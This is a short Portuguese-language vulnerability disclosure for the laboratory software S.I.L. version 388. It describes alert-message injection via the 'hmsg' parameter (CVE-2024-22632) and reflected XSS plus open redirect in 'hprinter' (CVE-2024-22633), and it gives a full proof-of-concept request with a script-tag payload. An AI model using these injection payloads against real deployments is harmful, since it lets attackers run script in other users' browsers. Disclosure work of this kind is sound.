Essas vulnerabilidades foram encontradas no software Sistema Inteligente para Laboratórios (S.I.L.) na versão 388 desenvolvido pela Setor Informática.
CVE-2024-22632
Ao acessar uma das páginas da aplicação é apresentado um alert para o usuário, o conteúdo desse alert pode ser alterdo pelo atacante a partir do parâmetro “hmsg”. Qualquer mensagem inserida nessa parâmetro da requisição é apresentado para o usuário.
CVE-2024-22633
O parâmetro “hprinter” é vulnerável a execução de códigos de JavaScript (XSS). Neste parâmetro, é possível inserir aspas simples para encerrar o texto de entrada e, em seguida, executar código arbitrários utilizando a tag de script.
Nesse parâmetro também há uma vulnerabilidade de Open Redirect como identificado na CVE-2024-24034 pelo Elizeu.
A seguir está a requisição que foi utilizada para demonstrar essa PoC nos prints acima.
hbairro=1&hbotao=11/2011&hcert=11/20&hchlab=%20%201&hcontrol=11/2011&hdataerro=0&hdataf=01/01/1967&hdatai=01/01/1967&hdesativa=11/2011&hdesclab=1&herro=s&hfocus=11/2011&hidadef=%20%201&hidadei=%20%201&hmensagem=20&hmsg=PoC1&hok=1&horientasex=on&hpassa=u]H[ww6KrA9F.x-F&hprinter=11/2011'"()%26%25<zzz><ScRiPt%20>alert('PoC2');</ScRiPt>&hsai=1&hsexo=A&htipo=Quantidade&htipo2=Somente%20Lista&htpidade=A&hvi=Video&inputbutton1=%20%20%20Sair%20%20%20&ssubmit=Exibir